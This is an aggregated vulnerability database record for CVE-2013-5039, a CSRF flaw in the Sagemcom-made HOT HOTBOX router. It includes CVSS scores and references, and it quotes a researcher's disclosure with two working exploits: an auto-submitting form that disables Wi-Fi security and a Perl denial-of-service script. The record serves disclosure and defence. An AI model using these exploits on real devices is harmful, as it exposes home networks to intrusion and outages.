ID

VAR-201312-0133


CVE

CVE-2013-5039


TITLE

HOT HOTBOX Router Software goform/wlanBasicSecurity Vulnerable to cross-site request forgery

Trust: 0.8

sources: JVNDB: JVNDB-2013-005733

DESCRIPTION

Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter.

HOT HOTBOX router is a router device. Such as changing the WIFI security field.

Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:

1. An Information-disclosure Vulnerability
2. An Authentication-bypass vulnerability
3. A Remote Denial-of-service Vulnerability
4. A Directory-traversal Vulnerability
5. An HTML-injection Vulnerability
6. A Cross-site Request-forgery Vulnerability

An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to the system. Other attacks are also possible.

Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected.

+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of                              |
| HOT Cable communication company in Israel.                                   |
| The Appliance is manufactured by SAGEMCOM                                    |
| and carries the model name F@st 3184.                                        |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities                                       |
+--------------------+---------------------------------------------------------+
| Release Date       | 2013/09/09                                              |
| Researcher         | Oz Elisyan                                              |
+--------------------+---------------------------------------------------------+
| System Affected    | HOTBOX Router/Modem                                     |
| Versions Affected  | 2.1.11 , possibly earlier                               |
| Related CVE Numbers| CVE-2013-5037, CVE-2013-5038                            |
|                    | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,            |
|                    | CVE-2013-5039                                           |
| Vendor Patched     | N/A                                                     |
| Classification     | 0-day                                                   |
| Exploits           | http://elisyan.com/hotboxDoS.pl,                        |
|                    | http://elisyan.com/hotboxCSRF.html                      |
+--------------------+---------------------------------------------------------+

Vulnerabilities List -

# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token

Demo - http://www.youtube.com/watch?v=CPlT09ZIj48

CSRF EXPLOIT:

<html>
<form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1>
<input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr">
<input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1">
<input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1">
<input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode">
<input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1">
<input type=hidden name="NBandwidth1" value="20" id="NBandwidth1">
<input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1">
<input type=hidden name="WifiSecurity" value="0" id="WifiSecurity">
<input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity">
<input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1">
<input type=hidden name="scanActions1" value="0" id="scanActions1">
<input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1">
<input type=hidden name="wpsActions1" value="0" id="wpsActions1">
</form>
</html>
<script>document.getElementById(1).submit();</script>

DENIAL OF SERVICE EXPLOIT:

use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n";

unless ($ARGV[0]){
    print "Please Enter Valid Host Name.\n";
    exit();
}

print "Sending Evil POST request...\n";
my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa";
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);
print "Done.";

Trust: 2.61

sources: NVD: CVE-2013-5039 // JVNDB: JVNDB-2013-005733 // CNVD: CNVD-2014-00017 // BID: 63550 // VULHUB: VHN-65041 // PACKETSTORM: 123901

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-00017

AFFECTED PRODUCTS

vendor: hot, model: hotbox router, scope: eq, version: 2.1.11

Trust: 3.0

vendor: hot, model: hotbox router, scope: eq, version: -

Trust: 1.0

vendor: hot, model: hotbox router, scope: -, version: -

Trust: 0.8

vendor: sagecom, model: f@st router, scope: eq, version: 31842.1.11

Trust: 0.3

sources: CNVD: CNVD-2014-00017 // BID: 63550 // JVNDB: JVNDB-2013-005733 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-5039
value: MEDIUM

Trust: 1.0

NVD: CVE-2013-5039
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2014-00017
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201312-562
value: MEDIUM

Trust: 0.6

VULHUB: VHN-65041
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2013-5039
severity: MEDIUM
baseScore: 5.4
vectorString: AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 5.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-00017
severity: MEDIUM
baseScore: 5.4
vectorString: AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 5.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-65041
severity: MEDIUM
baseScore: 5.4
vectorString: AV:A/AC:M/AU:N/C:P/I:P/A:P
accessVector: ADJACENT_NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 5.5
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // JVNDB: JVNDB-2013-005733 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-65041 // JVNDB: JVNDB-2013-005733 // NVD: CVE-2013-5039

THREAT TYPE

specific network environment

Trust: 0.6

sources: CNNVD: CNNVD-201312-562

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201312-562

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-005733

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-65041

PATCH

title: Top Page, url: http://www.hot.net.il/heb/Main/

Trust: 0.8

sources: JVNDB: JVNDB-2013-005733

EXTERNAL IDS

db: NVD, id: CVE-2013-5039

Trust: 3.5

db: PACKETSTORM, id: 123901

Trust: 3.2

db: BID, id: 63550

Trust: 0.9

db: JVNDB, id: JVNDB-2013-005733

Trust: 0.8

db: CNNVD, id: CNNVD-201312-562

Trust: 0.7

db: CNVD, id: CNVD-2014-00017

Trust: 0.6

db: EXPLOIT-DB, id: 29518

Trust: 0.1

db: VULHUB, id: VHN-65041

Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // BID: 63550 // JVNDB: JVNDB-2013-005733 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

REFERENCES

url:http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html

Trust: 3.1

url:http://www.youtube.com/watch?v=cplt09zij48

Trust: 2.4

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5039

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5039

Trust: 0.8

url:http://www.sagemcom.com/index.php?id=1760&l=25

Trust: 0.3

url:http://seclists.org/fulldisclosure/2013/nov/17

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2013-5038

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5220

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5037

Trust: 0.1

url:http://elisyan.com/hotboxcsrf.html

Trust: 0.1

url:http://elisyan.com/hotboxdos.pl

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5039

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5219

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-5218

Trust: 0.1

sources: CNVD: CNVD-2014-00017 // VULHUB: VHN-65041 // BID: 63550 // JVNDB: JVNDB-2013-005733 // PACKETSTORM: 123901 // CNNVD: CNNVD-201312-562 // NVD: CVE-2013-5039

CREDITS

Oz Elisyan

Trust: 0.4

sources: BID: 63550 // PACKETSTORM: 123901

SOURCES

db: CNVD, id: CNVD-2014-00017
db: VULHUB, id: VHN-65041
db: BID, id: 63550
db: JVNDB, id: JVNDB-2013-005733
db: PACKETSTORM, id: 123901
db: CNNVD, id: CNNVD-201312-562
db: NVD, id: CVE-2013-5039

LAST UPDATE DATE

2025-04-11T22:48:26.830000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2014-00017, date: 2014-01-02T00:00:00
db: VULHUB, id: VHN-65041, date: 2013-12-30T00:00:00
db: BID, id: 63550, date: 2013-09-09T00:00:00
db: JVNDB, id: JVNDB-2013-005733, date: 2014-01-06T00:00:00
db: CNNVD, id: CNNVD-201312-562, date: 2013-12-31T00:00:00
db: NVD, id: CVE-2013-5039, date: 2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2014-00017, date: 2014-01-02T00:00:00
db: VULHUB, id: VHN-65041, date: 2013-12-30T00:00:00
db: BID, id: 63550, date: 2013-09-09T00:00:00
db: JVNDB, id: JVNDB-2013-005733, date: 2014-01-06T00:00:00
db: PACKETSTORM, id: 123901, date: 2013-11-04T13:03:33
db: CNNVD, id: CNNVD-201312-562, date: 2013-12-31T00:00:00
db: NVD, id: CVE-2013-5039, date: 2013-12-30T04:53:07.193